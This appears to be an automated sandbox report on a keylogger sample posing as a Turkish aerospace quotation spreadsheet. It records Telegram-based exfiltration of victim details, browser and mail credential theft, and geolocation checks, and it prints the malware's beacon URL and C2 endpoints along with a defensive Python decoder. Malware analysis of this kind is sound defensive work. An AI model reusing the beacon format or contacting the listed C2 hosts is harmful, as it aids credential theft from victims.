                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match; File source: 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR

Source: Yara match; File source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe; Code function: 0_2_01016283 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe; Code function: 0_2_01016747 socket, WSAGetLastError, bind, WSAGetLastError, closesocket
MITRE ATT&CK Matrix (rebuilt one line per tactic; numeric prefixes are the hit badges the matrix shows on matched techniques and are kept as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 12 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 11 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection; HTML Smuggling; Dynamic API Resolution
Credential Access: 1 OS Credential Dumping; 121 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 127 System Information Discovery; 231 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Screen Capture; 1 Email Collection; 121 Input Capture; 3 Clipboard Data; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 1 Web Service; 4 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1576047; Sample: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe; Start date: 16/12/2024; Architecture: WINDOWS; Score: 100)

Start node
  DNS/IP: reallyfreegeoip.org; api.telegram.org; 2 other IPs or domains
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 11 other signatures
  Network-linked signatures: Tries to detect the country of the analysis system (by using the IP) [reallyfreegeoip.org]; Uses the Telegram API (likely for C&C communication) [api.telegram.org]

Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe (started from the start node)
  Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Maps a DLL or memory area into another process

  Process: RegSvcs.exe (started by the sample process)
    DNS/IP: api.telegram.org 149.154.167.220, ports 443, 49727 (TELEGRAMRU, United Kingdom); checkip.dyndns.com 193.122.130.0, ports 49705, 49708, 49710 (ORACLE-BMC-31898US, United States); reallyfreegeoip.org 104.21.67.152, ports 443, 49706, 49707 (CLOUDFLARENETUS, United States)
    Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | 34% | ReversingLabs | Win32.Trojan.AutoitInject
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Reputation (no antivirus detections on any entry)
reallyfreegeoip.org | 104.21.67.152 | true | false | high
api.telegram.org | 149.154.167.220 | true | false | high
checkip.dyndns.com | 193.122.130.0 | true | false | high
checkip.dyndns.org | unknown | unknown | false | high
Name | Malicious | Reputation (no antivirus detections on any entry)
https://reallyfreegeoip.org/xml/8.46.123.189 | false | high
http://checkip.dyndns.org/ | false | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20and%20Time:%2017/12/2024%20/%2011:29:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20767668%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | high
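The Telegram sendMessage URL above is the beacon itself: the victim details travel percent-encoded in the text parameter, and the bot token and chat_id are empty in the captured copy. The Python below is an added example, not part of the report or of Joe Sandbox; it decodes such a URL into its fields, tolerates the empty token and chat_id seen here, and, where a token is present, keeps only the public bot id and hides the secret half so the value can be shared in a ticket. The report's URL is embedded as input; the second URL is constructed and carries a made-up token.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Bot API path: /bot<token>/<method>; the token may be empty, as in the report.
BOT_PATH_RE = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)$")

# The sendMessage URL exactly as listed in the report (token and chat_id empty).
REPORT_URL = (
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668"
    "%0D%0ADate%20and%20Time:%2017/12/2024%20/%2011:29:42%0D%0ACountry%20Name:%20United%20States"
    "%0D%0A%5B%20767668%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean"
    "%20the%20system%20storage's%20empty.%20%5D"
)
# Constructed URL with a made-up token, to show the masking path; not from the report.
CONSTRUCTED_URL = (
    "https://api.telegram.org/bot1234567890:AAEconstructedNotARealToken/sendMessage"
    "?chat_id=4242&text=PC%20Name:TEST%0D%0ACountry%20Name:%20Nowhere"
)


def mask_token(token):
    """A bot token is '<numeric bot id>:<secret>'. The id is public; the secret is not."""
    if not token:
        return ""
    bot_id, sep, _secret = token.partition(":")
    return bot_id + (":<redacted>" if sep else "")


def parse_telegram_beacon(url):
    """Decode a Telegram Bot API URL into method, masked token, chat_id and the
    key: value lines of the message. Returns None for anything that is not a
    Bot API call on api.telegram.org."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        return None
    # keep_blank_values keeps the empty chat_id seen in the report instead of dropping it
    qs = parse_qs(parts.query, keep_blank_values=True)
    text = qs.get("text", [""])[0]  # parse_qs already percent-decodes
    fields, notes = {}, []
    for line in text.replace("\r\n", "\n").split("\n"):
        line = line.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")  # split on the first colon only
        if sep and key.strip():
            fields[key.strip()] = value.strip()
        else:
            notes.append(line)  # free text, e.g. the bracketed status sentence
    return {
        "method": m.group("method"),
        "bot_token": mask_token(m.group("token")),
        "token_present": bool(m.group("token")),
        "chat_id": qs.get("chat_id", [""])[0],
        "fields": fields,
        "notes": notes,
    }


if __name__ == "__main__":
    for url in (REPORT_URL, CONSTRUCTED_URL):
        print(parse_telegram_beacon(url))
```

Splitting on the first colon only is what keeps "Date and Time: 17/12/2024 / 11:29:42" intact; the bracketed sentence at the end of the report's message has no colon and lands in notes rather than being mistaken for a field.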
Name | Source | Malicious | Reputation (no antivirus detections on any entry)
https://www.office.com/ | RegSvcs.exe, 00000002.00000002.3940377959.00000000028F4000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org | RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp | false | high
https://chrome.google.com/webstore?hl=enH | RegSvcs.exe, 00000002.00000002.3940377959.00000000028B4000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20a | RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.office.com/lB | RegSvcs.exe, 00000002.00000002.3940377959.00000000028EF000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.office.com/H | RegSvcs.exe, 00000002.00000002.3940377959.00000000028E5000.00000004.00000800.00020000.00000000.sdmp | false | high
http://checkip.dyndns.org | RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp | false | high
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000002.00000002.3940377959.00000000028C3000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | false | high
http://varders.kozow.com:8081 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp | false | high
http://aborters.duckdns.org:8081 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp | false | high
https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | false | high
http://anotherarmy.dns.army:8081 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | false | high
http://checkip.dyndns.org/q | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp | false | high
https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000002.00000002.3940377959.00000000028BE000.00000004.00000800.00020000.00000000.sdmp | false | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | RegSvcs.exe, 00000002.00000002.3940377959.000000000277B000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | false | high
https://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.3940377959.0000000002751000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp | false | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | false | high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp | false | high
https://reallyfreegeoip.org/xml/ | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp; RegSvcs.exe, 00000002.00000002.3940377959.0000000002751000.00000004.00000800.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1576047
                                                                                          Start date and time:2024-12-16 13:36:03 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 8m 1s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:7
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
renamed because original name is a hash value
Original Sample Name: TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/2@3/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 52
• Number of non-executed functions: 270
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegSvcs.exe, PID 4780 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Time | Type | Description
07:37:09 | API Interceptor | 10288145x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | file.exe | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig |
149.154.167.220 | RdLfpZY5A9.exe | malicious | 77Rootkit, XWorm |
149.154.167.220 | 3edTbzftGf.exe | malicious | Discord Token Stealer, DotStealer |
149.154.167.220 | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | gjvU5KOFhX.exe | malicious | Discord Token Stealer, Millenuim RAT |
149.154.167.220 | hvqc3lk7ly.exe | malicious | Discord Token Stealer, DotStealer |
149.154.167.220 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
104.21.67.152 | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader |
104.21.67.152 | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
104.21.67.152 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT |
104.21.67.152 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
104.21.67.152 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
104.21.67.152 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT |
104.21.67.152 | Request for Quotations and specifications.pdf.exe | malicious | MassLogger RAT |
104.21.67.152 | hesaphareketi-01.pdf.exe | malicious | Snake Keylogger |
104.21.67.152 | hesaphareketi-01.pdfsxlx..exe | malicious | Snake Keylogger |
104.21.67.152 | 41570002689_20220814_05352297_HesapOzeti.exe | malicious | MassLogger RAT |
193.122.130.0 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | file.exe | malicious | Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc | checkip.dyndns.org/
193.122.130.0 | AsyncClient.exe | malicious | AsyncRAT, HVNC, PureLog Stealer | checkip.dyndns.org/
193.122.130.0 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | Malzeme #U0130stek Formu_12102024.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | jXN37dkptv.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | UBS20240190101.exe | malicious | Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 158.101.44.242
checkip.dyndns.com | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.6.168
checkip.dyndns.com | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 158.101.44.242
checkip.dyndns.com | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
checkip.dyndns.com | file.exe | malicious | Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc | 193.122.130.0
checkip.dyndns.com | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | file.exe | malicious | Snake Keylogger | 132.226.8.169
checkip.dyndns.com | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
checkip.dyndns.com | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | 77541373_BESOZT00_2024_99101234_1_4_1.exe | malicious | MassLogger RAT | 158.101.44.242
reallyfreegeoip.org | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 104.21.67.152
reallyfreegeoip.org | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
reallyfreegeoip.org | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
reallyfreegeoip.org | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
reallyfreegeoip.org | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134
reallyfreegeoip.org | file.exe | malicious | Snake Keylogger | 172.67.177.134
reallyfreegeoip.org | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
reallyfreegeoip.org | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 104.21.67.152
reallyfreegeoip.org | 77541373_BESOZT00_2024_99101234_1_4_1.exe | malicious | MassLogger RAT | 172.67.177.134
reallyfreegeoip.org | Ziraat Bankasi Swift Mesaji.exe | malicious | MassLogger RAT | 172.67.177.134
api.telegram.org | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | RdLfpZY5A9.exe | malicious | 77Rootkit, XWorm | 149.154.167.220
api.telegram.org | 3edTbzftGf.exe | malicious | Discord Token Stealer, DotStealer | 149.154.167.220
api.telegram.org | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | gjvU5KOFhX.exe | malicious | Discord Token Stealer, Millenuim RAT | 149.154.167.220
api.telegram.org | hvqc3lk7ly.exe | malicious | Discord Token Stealer, DotStealer | 149.154.167.220
api.telegram.org | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 149.154.167.99
TELEGRAMRU | njrtdhadawt.exe | malicious | Stealc, Vidar | 149.154.167.99
TELEGRAMRU | T0x859fNfn.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, Cryptbot, Vidar, Xmrig | 149.154.167.99
TELEGRAMRU | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 149.154.167.99
TELEGRAMRU | lem.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | Setup.msi | malicious | Vidar | 149.154.167.99
TELEGRAMRU | file.exe | malicious | PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar | 149.154.167.99
CLOUDFLARENETUS | PO.bat.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
